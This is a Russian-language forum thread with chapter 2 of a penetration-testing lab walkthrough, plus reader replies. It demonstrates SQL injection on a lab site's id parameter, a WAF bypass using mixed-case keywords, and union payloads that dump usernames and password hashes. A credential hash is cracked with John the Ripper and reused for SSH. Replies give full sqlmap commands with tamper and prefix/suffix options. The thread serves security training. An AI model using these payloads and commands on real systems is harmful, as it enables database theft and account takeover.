![]() |
Глава 2 Предыдущая главаСледующая глава Оглавление https://forum.antichat.xyz/attachmen...5c406824aa.png И так привет колеги. Сегодня погрузимся дальше в роль хакера пентестера и возьмем свой второй токен. Попадем на машину ssh(172.16.0.8). Вспоминаем что мы взяли в прошлый раз логин и пароль о почты. Пробуем этот логин и пароль везде где только можно,так использование одинаковых паролей - это одна из самых частых ошибок,которую допускает человек. Но увы этот пароль и логин от почты никуда не подошел,ни к админке к сайту,ни к ssh.Так что давайте ковыряться дальше. И будем мы сегодня изучать атаку на веб приложение,а если чуть подробнее то поговорим о таком векторе какSQL Injection и обход простенького WAF-а (WAF - Web Application FIrewall). Прежде чем начать,хотелось бы сказать на что стоит обращать внимания и чем пользоваться при пентесте веб приложения.Исходя из собственного опыта могу смело сказать ,что поиск уязвимостей веб приложенияпостроен на обнаружении аномального поведения веб контента в результате реакции на передаваемые данные в сторону сервера(пользовательский ввод "GET|POST запросы" ,куки,служебные заголовки и т.д) И как вы уже догадались все сканеры уязвимостей построены по этой логики.Но бывают ситуации когда сканеры уязвимости не правильно понимают логику веб приложения и как результат дает не верные отчеты о найденных уязвимостей. К тому же, такие известные утилиты как SQLmap,Acunetix и много им подобные использую в качестве UserAgent-а свое имя,и добавив запрет на такие UserAgent-а можно уже защитится от атак школьниками.А если говорить о каких нибудь более серьезных средствах защитах и различных WAF-ах - то это очень сильно запутает логику работы сканера уязвимостей и как вывод из всего выше сказанного - ручной фаззинг и поиск уязвимостей в разы продуктивней чем работа сканеров. Именно по этому мы сегодня с вами встретимся один на один с простенькой SQL инъекцией и простеньким WAF-ом Обычно я использую инструмент BurpSuite для ручного фаззинга,при работе с веб приложениями,но тут все гораздо проще.К тому же по этому инструменту нужно делать отдельный цикл статей) Ну что же ,давайте посмотрим на наш сайтhttp://192.168.101.9:443/ еще разочек под другим ракурсом) Первым делом проверим наличие админки на сайте: https://forum.antichat.xyz/attachments/4767697/2.png Дальше потыкаем по постам на главной странице: https://forum.antichat.xyz/attachments/4767697/1.png У нас есть один передаваемый параметр в GET запросе который отвечает за порядковый номер поста на сайте. Давайте с ним поиграем) По старой доброй привычке ткнем туда кавычку: https://forum.antichat.xyz/attachments/4767697/3.png Хмм.. Странно но нас редиректнуло на главную страницу... Привычную ошибку синтаксиса не то что бы не видать,а как по первому взгляду - инъекцией и не пахнет скажете вы.Но эпоха админов которые включают вывод ошибок в PHP все потихоньку уходит в прошлое) И по этому весьма логично предположить что в случаи какой то ошибки ,или неправильного ввода пользователем весьма очевидно такое поведения.Все таки предположим что тут есть инъекция и нужно просто попробовать сбалансировать запрос: Первой стадией при работе сSQL инъекцией является балансировка запроса: Это нечто иное как найти правильные закрывающие символы в запросе и отрезка не нужной части комментарием,например если выборка с базы данных идет по запросу PHP: Код:
$resultsome_url/index.php?id=1') -- - И правильными закрывающими символами тут будут ') И как результат вывод должен быть таким же как и при some_url/index.php?id=1.Если запрос не сбалансирован то поведения контента будет разным Ну что ж давайте играться с параметром id на нашем сайте: https://forum.antichat.xyz/attachments/4767697/4.png https://forum.antichat.xyz/attachments/4767697/5.png https://forum.antichat.xyz/attachments/4767697/6.png https://forum.antichat.xyz/attachments/4767697/7.png Немножко поигрались - мы уже смогли найти Boolian Blind SQL Injection) А теперь давайте разберем что мы сделали: 1)Сбалансировали запрос,после добавление правильных символов нас не бросало на главную,а выводился контент страницы которая имеет id=1 2)Попробовали добавить в запрос истинное выражение (and true -- -) и видим что нас перебросило на главную страницу...Хм..Так не должно быть.. Сразу же на ум приходит что тут стоит фильтр на пользовательский ввод. 3)Немного поигравшись с регистром - мы достигаем цели: 1') AnD TruE -- - нас не перебрасывает на главную) Вероятнее всего что фильтр работает только по словам в нижнем или верхнем регистре. 4) 1') AnD FalSe -- -Для закрепление вектора,это означает что если в запросе будет не истинное значение(ложь) или ошибка то нас будет бросать на главную. Уже можно крутить как слепую булеан блайнд) Но нам еще нужно проверить на Union Based вектор инъекции. Давайте найдем к-тво столбцов: https://forum.antichat.xyz/attachments/4767697/8.png https://forum.antichat.xyz/attachments/4767697/9.png https://forum.antichat.xyz/attachments/4767697/10.png Как видем у нас два столбца в запросе,пробуем сделать вывод.Но что бы вывести наш юнион запрос нужно добавить ложь в основной запрос. id=1') And FalSe UnIoN SeLeCt 11111,2222 -- - https://forum.antichat.xyz/attachments/4767697/11.png https://forum.antichat.xyz/attachments/4767697/12.png https://forum.antichat.xyz/attachments/4767697/13.png Как видите,есть вывод) Как говорится инжектабельно)))) Давайте крутить дальше) id=1') And FalSe UnIoN SeLeCt coNcaT(TaBLe_NamE),2222 fRoM InForMaTioN_SchEma.TabLeS WheRe TabLe_SchEma=database() limit 1,1-- - https://forum.antichat.xyz/attachments/4767697/15.png id=1') And FalSe UnIoN SeLeCt coNcaT(ColuMn_NamE),2222 fRoM InForMaTioN_SchEma.coLuMnS WheRe TabLe_NaMe='users' limit 1,1-- - https://forum.antichat.xyz/attachments/4767697/16.png id=1') And FalSe UnIoN SeLeCt coNcaT(ColuMn_NamE),2222 fRoM InForMaTioN_SchEma.coLuMnS WheRe TabLe_NaMe='users' limit 2,1-- - https://forum.antichat.xyz/attachments/4767697/17.png id=1') And FalSe UnIoN SeLeCt coNcaT(username),2222 fRoM users-- - https://forum.antichat.xyz/attachments/4767697/18.png id=1') And FalSe UnIoN SeLeCt coNcaT(password),2222 fRoM users-- - https://forum.antichat.xyz/attachments/4767697/19.png на password как видим также WAF,ничего,обойдем: id=1') And FalSe UnIoN SeLeCt coNcaT(paSSwOrD),2222 fRoM users-- - https://forum.antichat.xyz/attachments/4767697/20.png И финальный ввывод) https://forum.antichat.xyz/attachments/4767697/21.png Получаем имя и хеш) Дальше что бы мне нагло не сливать вам токен ,вам придется побрутить хеш) Брутим хеш,(он пару секунд брутится) Идем в админку,берем токен. И под этим же логином и паролем попадаем на ssh машину(ssh e.lindsey@192.168.101.9) пароль из хеша Дальше будем брать токен на SSH и учится пробрасывать порты. Всем спасибо Предыдущая глава Следующая глава Оглавление |
Ну на тот случай если у кого то с брутом проблемы возникли то:
Добавляем в какойто тектстовый файлик следующий контент: Код: Код:
e.lindsey:$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8.Код: Код:
john hashes.txtКод: Код:
Created directory: /root/.johnЛогинимся в админку и забираем токен затем конектимся к ssh: ssh e.lindsey@192.168.101.9 И гуляем по ссш: https://forum.antichat.xyz/attachments/4767710/2016.png https://forum.antichat.xyz/attachments/4767710/2016.png https://forum.antichat.xyz/attachments/4767710/2016.png |
Цитата:
Брутил я джоном за пару секунд) |
DarkNode канал Corp_Of_Hack на youtube не твой?
|
Цитата:
|
Не подскажете почему по ссылке https://192.168.101.9/ выдает ошибку ssl_error_rx_record_too_long, а по ссылке http://192.168.101.9:443/ все нормально. Или на порту 443 обычный http.
|
Спасибо за статью! Вопрос:
1) Можно все это раскрутить sqlmap'om? 2) Если да, то какой тампер использовать 3) Подойдет ли для этих целей commix ? |
Цитата:
Впринципе можно,но он криво крутит и намного дольше чем руками,хотя вектор ним обнаружить можно. |
Цитата:
ПС Ради интереса sqlmap --random-agent --url http://192.168.101.9:443/post.php?id=INJECTION_HERE --crawl=2 --batch --dbs --level=3 --risk=3 --tamper randomcase --hex посмотрю сколько времени займет и каков будет итог Дополняю ушло 3 минуты, НО [21:08:24] [ERROR] unable to retrieve the number of databases [21:08:24] [INFO] falling back to current database [21:08:24] [INFO] fetching current database [21:08:25] [INFO] retrieved: [21:08:25] [ERROR] unable to retrieve the database names, skipping to the next URL не смог он базы определить, я так понимаю не хватает параметра. |
Ради интереса пытаюсь вытащить базы sqlmap'om но вот как то не выходит. Ошибка [ERROR] unable to retrieve the number of databases.
Я перепробовал разные тамперы. Пробовал --hex --nocast, тот же итог. Очень хочется решить эту задачу =) Если кто в курсе, подскажите, чего не хватает. sqlmap --identify-waf -v3 --random-agent --url http://192.168.101.9:443/post.php?id=INJECTION_HERE --crawl=2 --batch --dbms=mysql --dbs --level=3 --risk=3 --tamper space2mysqlblank --no-cast --threads 10 Изначально было sqlmap --random-agent --url http://192.168.101.9:443/post.php?id=INJECTION_HERE --crawl=2 --batch --dbs --level=3 --risk=3 --tamper randomcase --hex |
Цитата:
--tamper randomcase-- использовать фильтр скульмапа для генерации пейлоада в различном регистре --random-agent-- использовать случайный UserAgent --code=200-- использовать в качестве валидных ответов заголовок ответа 200 ок, 301(редирект) будет распознан как невалидный запрос --level 5--использовать маскимальный уровень поиска векторов --risk3 почти тоже самое что и --level --technique U--пытаться использовать только векторы UnionBased SQL injection --url "http://someurl.php?id=*"-- астериксом(*) мы указываем место для инжекта --prefix-- то что использовать в начале запроса --suffix-- то что использовать в конце запроса --threads 10- к-тво потоков Цитата:
https://forum.antichat.xyz/attachments/4768302/111.png |
Цитата:
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю? дополнение: [18:54:24] [INFO] analyzing table dump for possible password hashes Database: site Table: users [1 entry] +----+-----------+ | id | username | +----+-----------+ | 1 | e.lindsey | +----+-----------+ Но хэша нет... sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 --tables --common-tables -T users --dump пробовал так. что опять упустил? |
Цитата:
|
Цитата:
Попробуй сначала так: sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 -T users --common-columns А потом sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 -T users --dump Или же просто так: sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 -T users -С username,password --dump |
Вообще,сугубо мое мнение по поводу sqlmap - это утилита которая используется больше как для постэксплуатации sql injection , но не для поиска. Уязвимость находится сперва ,проверяется на наличия WAF-а,изучается поведения вафа, и только потом в бой выходит скульмап)
На своем опыте я встречал такие инъекции которые посылали скульмап куда подальше,но руки никогда не подводили)) Вот пару старых моих видео про работу руками если кому интересно: [hide=12] |
Цитата:
Database: site Table: users [1 entry] +----+-----------+ | id | username | +----+-----------+ | 1 | e.lindsey | +----+-----------+ что ж, это еще раз доказала про руки и мозг Спасибо за подробные ответы - информация очень полезная. |
Цитата:
|
HackBar модифицированный
Цитата:
|
Цитата:
|
Цитата:
|
А почему в конце пишем
Цитата:
-- это начинается комментарий, а зачем еще одна черточка через пробел? |
Цитата:
|
У меня вопрос по PAYLOAD. Из дампера у меня есть готовый пэйлоад. Дамп качает крокозябры и никак не могу получить нормальный результат. Пробую мэпом - говорит что атрибут не имеет уязвимости. Как в мэп вставить готовый PAYLOAD из дампа?
Спасибо |
Цитата:
sqlmap -u http://192.168.101.9:443/post.php?id=1 -p id --flush-session --tamper randomcase --random-agent --threads 10 -D site -T users -C username,PasSwoRd --dump --batch |
Спасибо за статью, очень круто!!!
[doublepost=1515158804,1513804098][/doublepost]спасибо огромное за статьи, очень интересно. Вы как профессионал, могли бы посоветовать какую-то школу, курсы или книги по обучению ИБ и пентесту в частности!? |
Цитата:
Цитата:
|
Цитата:
|
Цитата:
|
| Время: 03:08 |